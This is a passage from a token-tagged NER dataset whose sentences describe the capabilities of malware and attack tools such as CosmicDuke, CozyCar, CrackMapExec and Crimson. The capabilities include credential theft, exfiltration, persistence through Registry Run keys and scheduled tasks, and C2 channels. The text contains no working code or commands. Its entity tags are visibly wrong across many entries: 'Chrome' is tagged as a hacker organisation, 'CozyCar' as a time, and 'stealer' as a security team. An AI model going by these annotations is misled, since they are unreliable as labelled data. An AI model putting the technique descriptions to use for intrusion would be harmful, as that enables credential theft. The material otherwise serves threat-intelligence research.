"O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "can", - "steal", - "Google", - "Chrome", - "and", - "Apple", - "Safari", - "browser", - "cookies", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CookieMiner", - "has", - "used", - "a", - "Unix", - "shell", - "script", - "to", - "run", - "a", - "series", - "of", - "commands", - "targeting", - "macOS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "exfiltrates", - "collected", - "files", - "automatically", - "over", - "FTP", - "to", - "remote", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "copies", - "and", - "exfiltrates", - "the", - "clipboard", - "contents", - "every", - "30", - "seconds." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "B-HackOrg", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "collects", - "user", - "credentials,", - "including", - "passwords,", - "for", - "various", - "programs", - "including", - "popular", - "instant", - "messaging", - "applications", - "and", - "email", - "clients", - "as", - "well", - "as", - "WLAN", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-HackOrg", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "collects", - "user", - "credentials,", - "including", - "passwords,", - "for", - "various", - "programs", - "including", - "Web", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "CosmicDuke", - "steals", - "user", - "files", - "from", - "local", - "hard", - "drives", - "with", - "file", - "extensions", - "that", - "match", - "a", - "predefined", - "list." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "steals", - "user", - "files", - "from", - "network", - "shared", - "drives", - "with", - "file", - "extensions", - "and", - "keywords", - "that", - "match", - "a", - "predefined", - "list." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "steals", - "user", - "files", - "from", - "removable", - "media", - "with", - "file", - "extensions", - "and", - "keywords", - "that", - "match", - "a", - "predefined", - "list." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "exfiltrates", - "collected", - "files", - "over", - "FTP", - "or", - "WebDAV.", - "Exfiltration", - "servers", - "can", - "be", - "separately", - "configured", - "from", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "attempts", - "to", - "exploit", - "privilege", - "escalation", - "vulnerabilities", - "CVE-2010-0232", - "or", - "CVE-2010-4398." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "CosmicDuke", - "searches", - "attached", - "and", - "mounted", - "drives", - "for", - "file", - "extensions", - "and", - "keywords", - "that", - "match", - "a", - "predefined", - "list." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "uses", - "a", - "keylogger." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CosmicDuke", - "collects", - "LSA", - "secrets." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "searches", - "for", - "Microsoft", - "Outlook", - "data", - "files", - "with", - "extensions", - ".pst", - "and", - ".ost", - "for", - "collection", - "and", - "exfiltration." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "CosmicDuke", - "uses", - "scheduled", - "tasks", - "typically", - "named", - "\"Watchmon", - "Service\"", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "takes", - "periodic", - "screenshots", - "and", - "exfiltrates", - "them." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "collects", - "Windows", - "account", - "hashes." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "contains", - "a", - "custom", - "version", - "of", - "the", - "RC4", - "algorithm", - "that", - "includes", - "a", - "programming", - "error." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "can", - "use", - "HTTP", - "or", - "HTTPS", - "for", - "command", - "and", - "control", - "to", - "hard-coded", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CosmicDuke", - "uses", - "Windows", - "services", - "typically", - "named", - "\"javamtsup\"", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "CostaBricks", - "has", - "added", - "the", - "entire", - "unobfuscated", - "code", - "of", - "the", - "legitimate", - "open", - "source", - "application", - "Blink", - "to", - "its", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CostaBricks", - "has", - "the", - "ability", - "to", - "use", - "bytecode", - "to", - "decrypt", - "embedded", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "CostaBricks", - "has", - "been", - "used", - "to", - "load", - "SombRAT", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CostaBricks", - "has", - "used", - "a", - "number", - "of", - "API", - "calls,", - "including", - "`VirtualAlloc`,", - "`VirtualFree`,", - "`LoadLibraryA`,", - "`GetProcAddress`,", - "and", - "`ExitProcess`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "CostaBricks", - "can", - "inject", - "a", - "payload", - "into", - "the", - "memory", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CostaBricks", - "can", - "implement", - "a", - "custom-built", - "virtual", - "machine", - "mechanism", - "to", - "obfuscate", - "its", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CozyCar", - "uses", - "Twitter", - "as", - "a", - "backup", - "C2", - "channel", - "to", - "Twitter", - "accounts", - "specified", - "in", - "its", - "configuration", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "payload", - "of", - "CozyCar", - "is", - "encrypted", - "with", - "simple", - "XOR", - "with", - "a", - "rotating", - "key.", - "The", - "CozyCar", - "configuration", - "file", - "has", - "been", - "encrypted", - "with", - "RC4", - "keys." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CozyCar", - "has", - "executed", - "Mimikatz", - "to", - "harvest", - "stored", - "credentials", - "from", - "the", - "victim", - "and", - "further", - "victim", - "penetration." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "persistence", - "mechanism", - "used", - "by", - "CozyCar", - "is", - "to", - "set", - "itself", - "to", - "be", - "executed", - "at", - "system", - "startup", - "by", - "adding", - "a", - "Registry", - "value", - "under", - "one", - "of", - "the", - "following", - "Registry", - "keys:", - "<br><code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", - "<br><code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", - "<br><code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>", - "<br><code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "CozyCar", - "dropper", - "has", - "masqueraded", - "a", - "copy", - "of", - "the", - "infected", - "system's", - "rundll32.exe", - "executable", - "that", - "was", - "moved", - "to", - "the", - "malware's", - "install", - "directory", - "and", - "renamed", - "according", - "to", - "a", - "predefined", - "configuration", - "file." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "CozyCar", - "dropper", - "copies", - "the", - "system", - "file", - "rundll32.exe", - "to", - "the", - "install", - "location", - "for", - "the", - "malware,", - "then", - "uses", - "the", - "copy", - "of", - "rundll32.exe", - "to", - "load", - "and", - "execute", - "the", - "main", - "CozyCar", - "component." - ], - "ner_tags": [ - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "persistence", - "mechanism", - "used", - "by", - "CozyCar", - "is", - "to", - "register", - "itself", - "as", - "a", - "scheduled", - "task." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Password", - "stealer", - "and", - "NTLM", - "stealer", - "modules", - "in", - "CozyCar", - "harvest", - "stored", - "credentials", - "from", - "the", - "victim,", - "including", - "credentials", - "used", - "as", - "part", - "of", - "Windows", - "NTLM", - "user", - "authentication." - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "main", - "CozyCar", - "dropper", - "checks", - "whether", - "the", - "victim", - "has", - "an", - "anti-virus", - "product", - "installed.", - "If", - "the", - "installed", - "product", - "is", - "on", - "a", - "predetermined", - "list,", - "the", - "dropper", - "will", - "exit." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "system", - "info", - "module", - "in", - "CozyCar", - "gathers", - "information", - "on", - "the", - "victim", - "host’s", - "configuration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "versions", - "of", - "CozyCar", - "will", - "check", - "to", - "ensure", - "it", - "is", - "not", - "being", - "executed", - "inside", - "a", - "virtual", - "machine", - "or", - "a", - "known", - "malware", - "analysis", - "sandbox", - "environment.", - "If", - "it", - "detects", - "that", - "it", - "is,", - "it", - "will", - "exit." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CozyCar's", - "main", - "method", - "of", - "communicating", - "with", - "its", - "C2", - "servers", - "is", - "using", - "HTTP", - "or", - "HTTPS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "A", - "module", - "in", - "CozyCar", - "allows", - "arbitrary", - "commands", - "to", - "be", - "executed", - "by", - "invoking", - "<code>C:\\Windows\\System32\\cmd.exe</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-SamFile" - ] - }, - { - "tokens": [ - "One", - "persistence", - "mechanism", - "used", - "by", - "CozyCar", - "is", - "to", - "register", - "itself", - "as", - "a", - "Windows", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "set", - "a", - "scheduled", - "task", - "on", - "the", - "target", - "system", - "to", - "execute", - "commands", - "remotely", - "using", - "at." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "brute", - "force", - "supplied", - "user", - "credentials", - "across", - "a", - "network", - "range." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "enumerate", - "the", - "domain", - "user", - "accounts", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "gather", - "the", - "user", - "accounts", - "within", - "domain", - "groups." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "discover", - "specified", - "filetypes", - "and", - "log", - "files", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "dump", - "hashed", - "passwords", - "from", - "LSA", - "secrets", - "for", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "create", - "a", - "registry", - "key", - "using", - "wdigest." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "dump", - "hashed", - "passwords", - "associated", - "with", - "Active", - "Directory", - "using", - "Windows'", - "Directory", - "Replication", - "Services", - "API", - "(DRSUAPI),", - "or", - "Volume", - "Shadow", - "Copy." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "enumerate", - "the", - "shared", - "folders", - "and", - "associated", - "permissions", - "for", - "a", - "targeted", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "pass", - "the", - "hash", - "to", - "authenticate", - "via", - "SMB." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "brute", - "force", - "passwords", - "for", - "a", - "specified", - "user", - "on", - "a", - "single", - "target", - "system", - "or", - "across", - "an", - "entire", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "discover", - "the", - "password", - "policies", - "applied", - "to", - "the", - "target", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "brute", - "force", - "credential", - "authentication", - "by", - "using", - "a", - "supplied", - "list", - "of", - "usernames", - "and", - "a", - "single", - "password." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "execute", - "PowerShell", - "commands", - "via", - "WMI." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "discover", - "active", - "IP", - "addresses,", - "along", - "with", - "the", - "machine", - "name,", - "within", - "a", - "targeted", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "dump", - "usernames", - "and", - "hashed", - "passwords", - "from", - "the", - "SAM." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "enumerate", - "the", - "system", - "drives", - "and", - "associated", - "system", - "name." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "collect", - "DNS", - "information", - "from", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "discover", - "active", - "sessions", - "for", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CrackMapExec", - "can", - "execute", - "remote", - "commands", - "using", - "Windows", - "Management", - "Instrumentation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CreepyDrive", - "can", - "use", - "legitimate", - "OAuth", - "refresh", - "tokens", - "to", - "authenticate", - "with", - "OneDrive." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CreepyDrive", - "can", - "use", - "OneDrive", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "CreepyDrive", - "can", - "upload", - "files", - "to", - "C2", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CreepyDrive", - "can", - "use", - "cloud", - "services", - "including", - "OneDrive", - "for", - "data", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "CreepyDrive", - "can", - "specify", - "the", - "local", - "file", - "path", - "to", - "upload", - "files", - "from." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "CreepyDrive", - "can", - "download", - "files", - "to", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CreepyDrive", - "can", - "use", - "Powershell", - "for", - "execution,", - "including", - "the", - "cmdlets", - "`Invoke-WebRequest`", - "and", - "`Invoke-Expression`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CreepyDrive", - "can", - "use", - "HTTPS", - "for", - "C2", - "using", - "the", - "Microsoft", - "Graph", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "CreepySnail", - "can", - "use", - "stolen", - "credentials", - "to", - "authenticate", - "on", - "target", - "networks." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CreepySnail", - "can", - "connect", - "to", - "C2", - "for", - "data", - "exfiltration." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "CreepySnail", - "can", - "use", - "PowerShell", - "for", - "execution,", - "including", - "the", - "cmdlets", - "`Invoke-WebRequst`", - "and", - "`Invoke-Expression`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "CreepySnail", - "can", - "use", - "Base64", - "to", - "encode", - "its", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CreepySnail", - "can", - "use", - "`getmac`", - "and", - "`Get-NetIPAddress`", - "to", - "enumerate", - "network", - "settings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CreepySnail", - "can", - "execute", - "`getUsername`", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CreepySnail", - "can", - "use", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "perform", - "audio", - "surveillance", - "using", - "microphones." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Crimson", - "contains", - "a", - "module", - "to", - "steal", - "credentials", - "from", - "Web", - "browsers", - "on", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "collect", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "contains", - "a", - "module", - "to", - "collect", - "data", - "from", - "removable", - "drives." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "decode", - "its", - "encoded", - "PE", - "file", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Purp", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "exfiltrate", - "stolen", - "information", - "over", - "its", - "C2." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "has", - "the", - "ability", - "to", - "delete", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "contains", - "commands", - "to", - "list", - "files", - "and", - "directories,", - "as", - "well", - "as", - "search", - "for", - "files", - "matching", - "certain", - "extensions", - "from", - "a", - "defined", - "list." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "contains", - "a", - "command", - "to", - "retrieve", - "files", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "use", - "a", - "module", - "to", - "perform", - "keylogging", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "contains", - "a", - "command", - "to", - "collect", - "and", - "exfiltrate", - "emails", - "from", - "Outlook." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "set", - "a", - "Registry", - "key", - "to", - "determine", - "how", - "long", - "it", - "has", - "been", - "installed", - "and", - "possibly", - "to", - "indicate", - "the", - "version", - "number." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "uses", - "a", - "custom", - "TCP", - "protocol", - "for", - "C2." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "has", - "the", - "ability", - "to", - "discover", - "pluggable/removable", - "drives", - "to", - "extract", - "files", - "from." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "contains", - "a", - "command", - "to", - "list", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Crimson", - "can", - "check", - "the", - "Registry", - "for", - "the", - "presence", - "of", - "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\last_edate</code>", - "to", - "determine", - "how", - "long", - "it", - "has", - "been", - "installed", - "on", - "a", - "host." - ], - "ner_tags": [ - 